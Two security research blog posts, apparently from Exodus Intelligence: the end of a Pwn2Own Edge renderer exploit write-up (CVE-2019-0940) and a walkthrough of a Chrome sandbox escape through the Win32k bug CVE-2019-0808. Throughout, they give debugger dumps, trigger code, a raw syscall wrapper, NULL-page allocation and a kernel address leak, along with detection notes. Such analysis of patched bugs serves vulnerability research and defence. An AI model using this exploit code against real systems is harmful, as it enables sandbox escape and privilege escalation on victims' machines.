00000140`e87e7f90  00000000`0000000c 00000140`e87e7da0
00000140`e87e7fa0  0000000a`0000000a 00000000`00000001
0:001> ln 00007ffe`47f85988
(00007ffe`47f85988)   edgehtml!RefCounted<WebCore::AudioBufferData,MultiThreadedRefCount>::`vftable`
0:001> dq 00000141`0142f880
00000141`0142f880  00007ffe`4694c630 00000140`d29753c0
00000141`0142f890  00000000`00000000 00000000`00000000
00000141`0142f8a0  00000000`0000000c 00000141`01a9d320
00000141`0142f8b0  00000000`00000004 00000140`e87e8040
00000141`0142f8c0  00007ffe`4694c630 00000140`d29753c0
00000141`0142f8d0  00000000`00000000 00000000`00000000
00000141`0142f8e0  00000000`00000008 00000141`01438230
00000141`0142f8f0  00000000`00000004 00000138`cffb9320
0:001> ln 00007ffe`4694c630
(00007ffe`4694c630)   chakra!Js::TypedArray<float,0,0>::`vftable`

After this operation the WebCore::AudioBufferData object points to the fake channel data (located at 0x00000140e87e7da0). The channel data contains a pointer to the fake DataView object (located at 0x00000140e87e7eb0). Initially, the Float32Array object is leaked and placed, but it is not a very convenient type to use for exploitation. To convert it to a DataView object, the type tag has to be changed in the metadata. The type tag for the Float32Array object type is 0x31, for the DataView object it is 0x38.
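The type tag change amounts to a small bit manipulation, sketched below. The two tag values come from the post; the assumption that the tag occupies the low 32 bits of the first metadata qword, with the upper 32 bits left untouched, is inferred from the annotated dump above and is not confirmed elsewhere. The function name `retag` is hypothetical.

```cpp
#include <cassert>  // for assert() when exercising the helper
#include <cstdint>

constexpr std::uint32_t kTypeTagFloat32Array = 0x31;  // from the post
constexpr std::uint32_t kTypeTagDataView = 0x38;      // from the post

// Replace the low 32 bits (assumed to hold the type tag) of the first
// metadata qword while preserving the upper 32 bits.
constexpr std::uint64_t retag(std::uint64_t metadata_qword, std::uint32_t new_tag) {
    return (metadata_qword & 0xFFFFFFFF00000000ull) | new_tag;
}

// Extract the assumed type tag from the first metadata qword.
constexpr std::uint32_t type_tag(std::uint64_t metadata_qword) {
    return static_cast<std::uint32_t>(metadata_qword & 0xFFFFFFFFull);
}
```

Under these assumptions, a leaked value of 0x0000008000000031 becomes 0x0000008000000038 after retagging, which matches the qword annotated as the type tag in the dump.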

The fake DataView object is accessed by calling getChannelData() of the WebCore::AudioBufferData object.

At this point an arbitrary read-write primitive is achieved.

Wrapping up the renderer exploit

Getting code execution in the Microsoft Edge renderer is a bit more involved than in other browsers, since Microsoft Edge employs mitigations known as Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG). Nevertheless, there is a way to bypass ACG. With an arbitrary read-write primitive it is possible to find the stack address, set up a fake stack frame and divert code execution to a function of choice by overwriting the return address. This method was chosen to execute the sandbox escape payload.

The last problem that had to be addressed in order to have reliable process continuation is the LFH double-free mitigation. Once exploitation is over, some pointers are left behind, and the process crashes when the heap manager picks them up. Certain pointers can be easily found by leaking the addresses of the relevant objects. One last pointer had to be found by scanning the heap as there was no straightforward way to find it. Once the pointers are found they are overwritten with null.

Open problems

The exploit has the following issues:

  1. the vulnerability trigger depends on hardware;
  2. exploit reliability is about 75%.

The first issue is due to the hardware error requirement described earlier. The trigger works only on VMware and on some devices with integrated video hardware. It may be possible to avoid the hardware dependency by triggering some generic video graphics hardware error.

The second issue is mostly due to the complicated heap manipulations required and to the LFH mitigations. Reliability could probably be improved with a smarter heap arrangement.

Process continuation was solved as described in the previous section. No artifacts exist.

Detection

It is possible to detect exploitation of the described vulnerability by searching for the following combination of operations in JavaScript code:

  1. repeated calls to createPattern()
  2. setting canvas attributes “width” and “height” to large values
  3. calling createPattern() again
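
As a rough illustration, the three indicators above could be checked with a simple text heuristic like the one below. This is a sketch, not a production detector: the thresholds `kMinRepeatedCalls` and `kLargeDimension` are hypothetical (the post gives no numbers), only decimal literals assigned directly to `.width` or `.height` are recognized, and obfuscated scripts would evade it.

```cpp
#include <cassert>  // for assert() when exercising the helper
#include <cstddef>
#include <regex>
#include <string>

// Hypothetical thresholds; the post does not give concrete values.
constexpr int kMinRepeatedCalls = 2;
constexpr long kLargeDimension = 16384;

// Returns true if the script calls createPattern() repeatedly, then assigns a
// large canvas width/height, then calls createPattern() at least once more.
bool looks_like_trigger(const std::string& script) {
    static const std::regex call_re(R"(createPattern\s*\()");
    static const std::regex dim_re(R"(\.(?:width|height)\s*=\s*(\d{1,9}))");
    const std::sregex_iterator end;

    // Find the first assignment of a large dimension.
    std::size_t large_pos = std::string::npos;
    for (std::sregex_iterator it(script.begin(), script.end(), dim_re); it != end; ++it) {
        if (std::stol((*it)[1].str()) >= kLargeDimension) {
            large_pos = static_cast<std::size_t>((*it)[0].first - script.begin());
            break;
        }
    }
    if (large_pos == std::string::npos) {
        return false;
    }

    // Count createPattern() calls before and after that assignment.
    int before = 0;
    int after = 0;
    for (std::sregex_iterator it(script.begin(), script.end(), call_re); it != end; ++it) {
        const auto pos = static_cast<std::size_t>((*it)[0].first - script.begin());
        (pos < large_pos ? before : after) += 1;
    }
    return before >= kMinRepeatedCalls && after >= 1;
}
```

A script that only resizes a canvas, or only calls createPattern() once, is not flagged by this heuristic; the ordering of the three steps is what it keys on.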

Mitigation

It is possible to mitigate this issue by disabling JavaScript.
The described vulnerability was patched by Microsoft in the May 2019 updates.

Conclusion

As a result, reliability of the renderer exploit achieved a ~75% success rate. Exploitation takes about 1-2 seconds on average. When multiple retries are required then exploitation can take a bit more time.

Microsoft has gone to great lengths to harden the Edge browser renderer process, as browsers remain a major attack vector and the renderer has the largest attack surface. Yet a single vulnerability was enough to achieve memory disclosure and gain an arbitrary read-write primitive to compromise a content process. Part 2 will discuss an interesting logical sandbox escape vulnerability.

Exodus 0day subscribers have had access to this exploit for use on penetration tests and/or implementing protections for their stakeholders.

The post Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1 appeared first on Exodus Intelligence.

Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay

17 May 2019 at 14:53

This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.

Overview

On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers to escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.

Since Google’s blog post, there has been one crash PoC exploit for Windows 7 x86 posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild.

Analysis of the Public PoC

To provide appropriate context for the rest of this blog, this section first analyzes the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot is then set up as the primary drop down menu, and hMenuSub is configured as its submenu.

HMENU hMenuRoot = CreatePopupMenu();
HMENU hMenuSub = CreatePopupMenu();
...
MENUINFO mi = { 0 };
mi.cbSize = sizeof(MENUINFO);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP;
SetMenuInfo(hMenuRoot, &mi);
SetMenuInfo(hMenuSub, &mi);

AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");

Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed.

SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);

The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.

Window message call flow before and after setting the WH_CALLWNDPROC hook

Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL.

hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain’s window procedure to DefWindowProc(), which is a function in the Windows API responsible for handling any window messages not handled by the window itself.

The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally, the x, y, width, and height parameters for CreateWindowA() ensure that the window is positioned at (0x0, 0x0) and is 1 pixel by 1 pixel in size. This can be seen in the code below.

WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = hInst;
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "WNDCLASSMAIN";
RegisterClassExA(&wndClass);
hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);

TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL);
	
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
	TranslateMessage(&msg);
	DispatchMessageW(&msg);

	if (iMenuCreated >= 1) {
		bOnDraging = TRUE;
		callNtUserMNDragOverSysCall(&pt, buf);
		break;
	}
}

After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain’s message queue, which will be retrieved in main()’s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain’s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc().

BOOL bOnDraging = FALSE;
....
LRESULT CALLBACK WindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
    tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;

    if (!bOnDraging) {
        return CallNextHookEx(0, code, wParam, lParam);
    }
....

As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause an EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hook and will cause execution to be diverted to the function DisplayEventProc().

UINT iMenuCreated = 0;

VOID CALLBACK DisplayEventProc(HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime)
{
    switch (iMenuCreated)
    {
    case 0:
        SendMessageW(hwnd, WM_LBUTTONDOWN, 0, 0x00050005);
        break;
    case 1:
        SendMessageW(hwnd, WM_MOUSEMOVE, 0, 0x00060006);
        break;
    }
    printf("[*] MSG\n");
    iMenuCreated++;
}

Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LBUTTONDOWN window message to hWndMain using SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain’s window message queue, iMenuCreated is incremented.
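
The lParam value 0x00050005 passed to SendMessageW() encodes the point (0x5, 0x5): mouse messages carry the x coordinate in the low 16 bits and the y coordinate in the high 16 bits. The packing can be sketched as follows; the helper names are hypothetical and simply mirror what the Win32 MAKELPARAM-style macros do.

```cpp
#include <cassert>  // for assert() when exercising the helpers
#include <cstdint>

// Pack a point into a mouse-message lParam: x in the low word, y in the high word.
constexpr std::uint32_t pack_point(std::uint16_t x, std::uint16_t y) {
    return static_cast<std::uint32_t>(x) | (static_cast<std::uint32_t>(y) << 16);
}

// Recover the x coordinate (low word) from a packed lParam.
constexpr std::uint16_t point_x(std::uint32_t lparam) {
    return static_cast<std::uint16_t>(lparam & 0xFFFFu);
}

// Recover the y coordinate (high word) from a packed lParam.
constexpr std::uint16_t point_y(std::uint32_t lparam) {
    return static_cast<std::uint16_t>(lparam >> 16);
}
```

With these helpers, `pack_point(5, 5)` gives 0x00050005 and `pack_point(6, 6)` gives 0x00060006, the two constants used in DisplayEventProc().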

hWndMain then processes the WM_LBUTTONDOWN message and selects hMenuRoot, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time around the second case is executed as iMenuCreated is now 1. This case will use SendMessageW() to send a WM_MOUSEMOVE message that moves the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag and drop operation is being performed. Following this, iMenuCreated is incremented once again and execution returns to the following code with the message loop inside main().

CHAR buf[0x100] = { 0 };
POINT pt;
pt.x = 2;
pt.y = 2;
...
if (iMenuCreated >= 1) {
    bOnDraging = TRUE;
    callNtUserMNDragOverSysCall(&pt, buf);
    break;
}

Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf.

callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated.

void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) {
	_asm {
		mov eax, 0x11ED
		push address2
		push address1
		mov edx, esp
		int 0x2E
		pop eax
		pop eax
	}
}

NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.

LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
    v6 = xxxSendMessage(
           var_pPopupMenu->spwndNextPopup,
           MN_FINDMENUWINDOWFROMPOINT,
           (WPARAM)&pPopupMenu,
           (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the 
                                      // MN_FINDMENUWINDOWFROMPOINT usermode callback
                                      // using the address of pPopupMenu as the 
                                      // wParam argument.
    ThreadUnlock1();
    if ( IsMFMWFPWindow(v6) )  // Validate the handle returned from the user
                               // mode callback is a handle to a MFMWFP window.
      v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned 
                                                                        // handle is a handle to 
                                                                        // a window object. Set v1 to
                                                                        // TRUE if all is good.
      ...

When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed.

if (cwp->message == WM_MN_FINDMENUWINDOWFROMPOINT)
{
    bIsDefWndProc = FALSE;
    printf("[*] HWND: %p \n", cwp->hwnd);
    SetWindowLongPtr(cwp->hwnd, GWLP_WNDPROC, (ULONG64)SubMenuProc);
}
return CallNextHookEx(0, code, wParam, lParam);

This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().

Once the hook exits, hWndMain’s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function.

SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages. This will prevent the application becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, or the handle to the window that was created using the menu class string.

LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    if (msg == WM_MN_FINDMENUWINDOWFROMPOINT)
    {
        SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);
        return (ULONG)hWndFakeMenu;
    }
    return DefWindowProc(hwnd, msg, wParam, lParam);
}
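
The interplay between the hook and the swapped window procedure can be modelled without any Win32 APIs, as in the sketch below. Every name and value here is a hypothetical stand-in (`Window`, `send_message`, the message id and the fake handle value are not from the PoC); the point is only the ordering: the hook runs first and swaps the procedure, then the swapped procedure restores the default and returns the fake menu handle.

```cpp
#include <cassert>  // for assert() when exercising the model
#include <cstdint>

using Handle = std::uintptr_t;
struct Window;
using WndProc = Handle (*)(Window&, unsigned);

// Hypothetical stand-in for a window: only its current procedure is modelled.
struct Window {
    WndProc proc;
};

constexpr unsigned kFindMenuWindowMsg = 1;  // placeholder message id
constexpr Handle kFakeMenuHandle = 0xFA4E;  // stands in for hWndFakeMenu

// Stands in for DefWindowProc(): handles nothing and returns 0.
Handle default_proc(Window&, unsigned) { return 0; }

// Stands in for SubMenuProc(): restore the default procedure, return the fake handle.
Handle sub_menu_proc(Window& w, unsigned msg) {
    if (msg == kFindMenuWindowMsg) {
        w.proc = default_proc;
        return kFakeMenuHandle;
    }
    return default_proc(w, msg);
}

// Stands in for the WH_CALLWNDPROC hook: runs before the window procedure.
void hook(Window& w, unsigned msg) {
    if (msg == kFindMenuWindowMsg) {
        w.proc = sub_menu_proc;
    }
}

// Deliver a message: hook first, then whatever procedure is installed afterwards.
Handle send_message(Window& w, unsigned msg) {
    hook(w, msg);
    WndProc proc = w.proc;
    return proc(w, msg);
}
```

In this model, sending the find-menu-window message returns the fake handle while leaving the window with its default procedure again, so later messages are handled normally.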

Since hWndFakeMenu is a valid window handle it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL as CreateWindowA() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex().

MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu’s spMenu field. However, since hWndFakeMenu’s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.

tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
  tagITEM *result; // eax

  if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur 
                                                          // here if spMenu is NULL.
    result = 0;
  else
    result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
  return result;
}

Sandbox Limitations

To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:

  • All processes in the Chrome sandbox run at Low Integrity.
  • A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.
  • Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation.
  • On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys.

The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog.

The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.

The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates.

Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.

Sandbox Exploit Explanation

Creating a DLL for the Chrome Sandbox

As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files.

To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files.

Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.

Explanation of the Existing Limited Write Primitive

Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections.

Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below:

void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
  ...
          var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write 
                                                         // operation should occur, minus an 
                                                         // offset of 0x4.
          temp_var_PITEM = var_PITEM;
          if ( var_PITEM )
          {
            ...
            var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the 
                                                         // address where the second write operation 
                                                         // should occur, minus an offset of 0x4. This 
                                                         // address will be 0x6C bytes earlier in 
                                                         // memory than the address in var_PITEM.
            if ( fSet )
            {
              *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the 
                                                             // attacker controlled address.
              if ( var_PITEM_Minus_Offset_Of_0x6C )
              {
                *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; 
                                                    // Conduct the second write to the attacker
                                                    // controlled address minus 0x68 (0x6C-0x4).
...

xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted.

It is also important to note that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already there. Furthermore, even if an attacker starts their write at some offset, they will still only be able to write the value \x40 or \x80 to an address at best.
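
The effect of the two writes can be simulated on an ordinary byte buffer, as sketched below. This is a model only: the buffer stands in for attacker-chosen memory, `set_gap_state` and `or_dword` are hypothetical helper names, and the second write is performed unconditionally here, whereas the kernel code skips it when the previous item pointer is NULL.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kItemStride = 0x6C;  // distance between items, per the decompilation

// Read a DWORD from the buffer at the given byte offset.
std::uint32_t load_dword(const std::vector<std::uint8_t>& mem, std::size_t offset) {
    assert(offset + sizeof(std::uint32_t) <= mem.size());
    std::uint32_t value = 0;
    std::memcpy(&value, mem.data() + offset, sizeof(value));
    return value;
}

// Model `*(DWORD *)(mem + offset) |= bits`: bits can be set but never cleared.
void or_dword(std::vector<std::uint8_t>& mem, std::size_t offset, std::uint32_t bits) {
    const std::uint32_t value = load_dword(mem, offset) | bits;
    std::memcpy(mem.data() + offset, &value, sizeof(value));
}

// Model the two writes made when fSet is true. `item` is the offset of the
// item for uIndex; the item for uIndex - 1 lies kItemStride bytes earlier.
void set_gap_state(std::vector<std::uint8_t>& mem, std::size_t item) {
    assert(item >= kItemStride);
    or_dword(mem, item + 4, 0x80000000u);
    or_dword(mem, item - kItemStride + 4, 0x40000000u);
}
```

Running the model against a buffer whose target DWORD already holds 0x00000001 leaves 0x80000001 behind: existing bits survive and only the top byte gains a bit, which is why a stronger primitive is needed.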

From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections.

Allocating the NULL Page

On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory.

Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then be rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.

typedef NTSTATUS(WINAPI *NTAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG ZeroBits,
	PULONG AllocationSize,
	ULONG AllocationType,
	ULONG Protect
);
NTAllocateVirtualMemory pfnNtAllocateVirtualMemory = 0;
....
pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
....
// Thanks to https://github.com/YeonExp/HEVD/blob/c19ad75ceab65cff07233a72e2e765be866fd636/NullPointerDereference/NullPointerDereference/main.cpp#L56 for
// explaining this in an example along with the finer details that are often forgotten.
bool allocateNullPage() {
	/* Set the base address at which the memory will be allocated to 0x1.
	This is done since a value of 0x0 will not be accepted by NtAllocateVirtualMemory,
	however due to page alignment requirements the 0x1 will be rounded down to 0x0 internally.*/
	PVOID BaseAddress = (PVOID)0x1;

	/* Set the size to be allocated to 40960 to ensure that there
	   is plenty of memory allocated and available for use. */
	SIZE_T size = 40960;

	/* Call NtAllocateVirtualMemory to allocate the virtual memory at address 0x0 with the size
	specified in the variable size. Also make sure the memory is allocated with read, write,
	and execute permissions.*/
	NTSTATUS result = pfnNtAllocateVirtualMemory(GetCurrentProcess(), &BaseAddress, 0x0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);

	// If the call to NtAllocateVirtualMemory failed, return FALSE.
	if (result != 0x0) {
		return FALSE;
	}

	// If the code reaches this point, then everything went well, so return TRUE.
	return TRUE;
}
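
The rounding that turns a base address of 0x1 into page 0 is ordinary alignment arithmetic. The following sketch assumes the 4 KiB (0x1000) page size of x86 Windows and assumes that the region is expanded to whole pages covering the requested range; the real rounding happens inside the kernel, and align_down, align_up and pages_covering are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

#define SKETCH_PAGE_SIZE 0x1000u /* assumed 4 KiB pages */

/* Round an address down to the start of its page. */
static uint32_t align_down(uint32_t addr) {
    return addr & ~(SKETCH_PAGE_SIZE - 1u);
}

/* Round an address up to the next page boundary (no-op if already aligned). */
static uint32_t align_up(uint32_t addr) {
    assert(addr <= 0xFFFFF000u); /* avoid wrap-around in this sketch */
    return (addr + SKETCH_PAGE_SIZE - 1u) & ~(SKETCH_PAGE_SIZE - 1u);
}

/* Number of whole pages needed to cover [base, base + size). */
static uint32_t pages_covering(uint32_t base, uint32_t size) {
    return (align_up(base + size) - align_down(base)) / SKETCH_PAGE_SIZE;
}
```

Under these assumptions, align_down(0x1) yields 0x0, which is why a base address of 0x1 is enough to reach the NULL page.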

Finding the Address of HMValidateHandle

Once the NULL page has been allocated, the exploit obtains the address of the HMValidateHandle() function. HMValidateHandle() is useful to attackers because it allows them to obtain a userland copy of any object for which they hold a handle. This leak also works at Low Integrity on Windows versions prior to Windows 10 RS4.

By abusing this functionality to copy objects which contain a pointer to their location in kernel memory, such as tagWND (the window object), into user mode memory, an attacker can leak the addresses of various objects simply by obtaining a handle to them.

As HMValidateHandle() is not exported from user32.dll, an attacker cannot obtain its address directly from user32.dll’s export table. Instead, the attacker must find an exported user32.dll function that calls HMValidateHandle(), read the relative offset encoded in that call instruction, and then perform some math to calculate the true address of HMValidateHandle().

This is done by obtaining the address of the exported function IsMenu() from user32.dll and then searching for the first instance of the byte \xE8 within IsMenu()’s code, which signals the start of a relative call to HMValidateHandle(). By then performing some math on the base address of user32.dll, the relative offset in the call, and the offset of IsMenu() from the start of user32.dll, the attacker can obtain the address of HMValidateHandle(). This can be seen in the following code.

HMODULE hUser32 = LoadLibraryW(L"user32.dll");
LoadLibraryW(L"gdi32.dll");

// Find the address of HMValidateHandle using the address of user32.dll
if (findHMValidateHandleAddress(hUser32) == FALSE) {
    printf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
    ExitProcess(-1);
}
...
